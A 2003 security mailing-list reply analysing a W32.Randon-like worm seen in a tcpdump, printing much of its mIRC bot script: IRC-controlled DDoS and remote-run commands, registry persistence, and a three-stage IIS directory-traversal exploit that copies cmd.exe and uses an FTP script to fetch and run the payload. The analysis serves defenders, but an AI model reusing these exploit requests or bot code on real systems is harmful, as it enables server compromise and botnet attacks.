On 14 Jul 2003 17:35:36 -0000, sgt_b <sgt_b2002 (at) yahoo (dot) com [email concealed]> wrote:
>
>
> I've included a link to a tcpdump taken that shows a standard IIS
> directory-traversal attack. I was looking over the packets and noticed a
> reference to www.google.com. Could someone take a look, and let me know
> what this is being used for?
>
> http://12.208.102.165/attack3.dump
> atack3.dump=1.6kb

It's either this:

http://www.gdgsoft.com/info/notes/gsfxalert.asp

or a very close relative. This beastie swept through my networks and
has caused quite a few machines to become infected.

The variant that I've got creates:

C:\WINNT\SYSTEM32\dfg ghj\loi gty
which contains this:

CLS.BAT
DATA.BAK
DEXE.CPL
FSLX.EXE
KLSYS.EXE
NEXE.CPL
PLUG.DLL
PSC32.EXE
SYSTL.EXE
TSYSL.BAT
WINSE.EXE

It's appears to be a more recent version of W32.Randon.worm:

http://vil.nai.com/vil/content/v_100097.htm

with quite a few "improvements" like a much larger dictionary and
it doesn't seem to be detected by several of the larger anti-virus
packages (I might add that clamd *does* find this one as W32.Mix)
Oh, and it's got DDoS capabilities.

Here's the top bit of `strings PLUG.DLL`:

on *:START:{
run systl.exe /n /fh winsck
sconf
inc %many
if (%many = 1) { set %infecttime $day $date $time | regs | checksf | makeSHR }
alias n0clone { if ($portfree(29275) == $false) { exit } | socklisten noclone 29275 }
on *:TEXT:*:*: {
if ($nick isop $rds(sc)) {
if ($1 = !ntimer) { if ($2 = Sock) { set %ntnick $3 | set %ntserver $4 | set %ntport $5 | sockopen NTimer $+ $r(1,1000) $+ $fnick %ntserver %ntport } }
if ($1 = !ntreg) { reg $2- }
if ($1 = !ntstop) { ntstop }
if ($1 = !dde) { /dde $2 command "" / $+ $3- }
if ($1 = !ind) { .identd on $2- }
if ($1 = !-) && ($2 != $null) { %- = $2- | / $+ %- | unset %- }
if ($1 = !pfast) { if ($4 == random) { //Tw1stStart $2 $3 $r(1,64000) | halt } | //Tw1stStart $2 $3 $4 }
if ($1 = !fserv) { /saym [F-Serv Initialized] ( $+ $nick $+ ) ( Enjoy! | /fserve $nick 3 $2 }
if ($1 = !packet) && ($3 != $null) { run systl.exe /n /fh /r "ping.exe $2 -n $3 -l 65500" | saym
14DDoS
14 packeting $2 with $calc($3 *65536/1024/1000) $+ mb traffic }
if ($1 = !packet.stop) { run systl.exe /n /fh /r "winse.exe -kf ping.exe" | saym
14DDoS
14 packeting halted! }
if ($1 = !run) && ($2 != $null) { /run $2- }
if ($1 = !icmp) { if ($2 == $null) { /saym
rror
yntax: (!icmp ip packetsize howmany, ie: !icmp 127.0.0.1 2000 1000) | halt } | run systl.exe /n /r "ping -n $4 -l $3 -w 0 $2 " }
if ($1 = !Clone) { /clone $2- }
if ($1 = !syn) { if ($2 !== $null) { saym
.
.
.

and so it goes for 692 lines. The odd HTTP connects that you saw were from
the very end of PLUG.DLL:

alias sconf {
.ddeserver on gtt1wst3r1.4.2
.nick [_ $+ $r(1000,99999) $+ ]]
.n0clone
.Cona
.timercheck 0 10 Cona
.timerh1dd3 -o 0 1 H1dd3
.timers33 -o 0 1 s33
.timerregs -o 0 1 regs
.run systl.exe /n /fh /r cls.BAT
.timerkillsofts -o 0 5 killsofts
alias regs { if ($Regread(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\R
un\salfx) = NA) { $RegWrite(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
on\Run\salfx,$mircdirklsys.exe,REG_SZ) } }
alias saym { if ($me isvo $rds(sc)) { clearall | msg $rds(sc) $1- } }
alias checksf { if ($exists($rds(sf)) = $false) && ($findfile(c:\,$rds(sf),0) != 0) { copy $findfile(c:\,$rds(sf),1) $rds(sf) } }
on *:SOCKOPEN:Sg1.*: {
sockwrite -n $sockname GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\
cmd.exe+c:\inetpub\scripts\script.exe HTTP/1.1
sockwrite -n $sockname Host: www.google.com
sockwrite -n $sockname Connection: keep-alive
sockwrite $sockname $crlf
on *:SOCKCLOSE:Sg1.*: {
sockopen Sg2. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46)
on *:SOCKOPEN:Sg2.*: {
saym
IIS Exploit
ATTEMPTING STAGE 2
sockwrite -n $sockname GET /scripts/script.exe?/c+echo+open+127.0.0.1>tmp2&&echo+Administrator>>tmp
2&&echo+1234>>tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+ $+ $rds(sf) $+
>>tmp2&&echo+bye>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&
&tmp2.cmd HTTP/1.1
sockwrite -n $sockname Host: www.google.com
sockwrite -n $sockname Connection: keep-alive
sockwrite $sockname $crlf
on *:SOCKCLOSE:Sg2.*: {
saym
IIS Exploit
STAGE 2 COMPLETE
sockopen Sg3. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46)
on *:SOCKOPEN:Sg3.*: {
saym
IIS Exploit
ATTEMPTING STAGE 3
sockwrite -n $sockname GET /scripts/httpodbc.dll?MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem3
2%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5C $+ $rds(sf) HTTP/1.1
sockwrite -n $sockname Host: www.google.com
sockwrite -n $sockname Connection: keep-alive
sockwrite $sockname $crlf
on *:SOCKCLOSE:Sg3.*: {
saym
IIS Exploit
STAGE 3 COMPLETE

An infected host will join an IRC channel on rul3z.q8hell.org and
sit waiting for instructions. The host will also start scanning
for windows shares that it can infected. It appears to also use
a fairly large dictionary in an attempt to guess passwords on any shares
that it finds. And finally, the infected host will start scanning for
IIS web servers to infect.

Paul
--
Paul Dokas dokas (at) cs.umn (dot) edu [email concealed]
======================================================================
Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla."

------------------------------------------------------------------------
----
Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
world's premier technical IT security event! 10 tracks, 15 training sessions,
1,800 delegates from 30 nations including all of the top experts, from CSO's to
"underground" security specialists. See for yourself what the buzz is about!
Early-bird registration ends July 3. This event will sell out. www.blackhat.com
------------------------------------------------------------------------
----

[ reply ]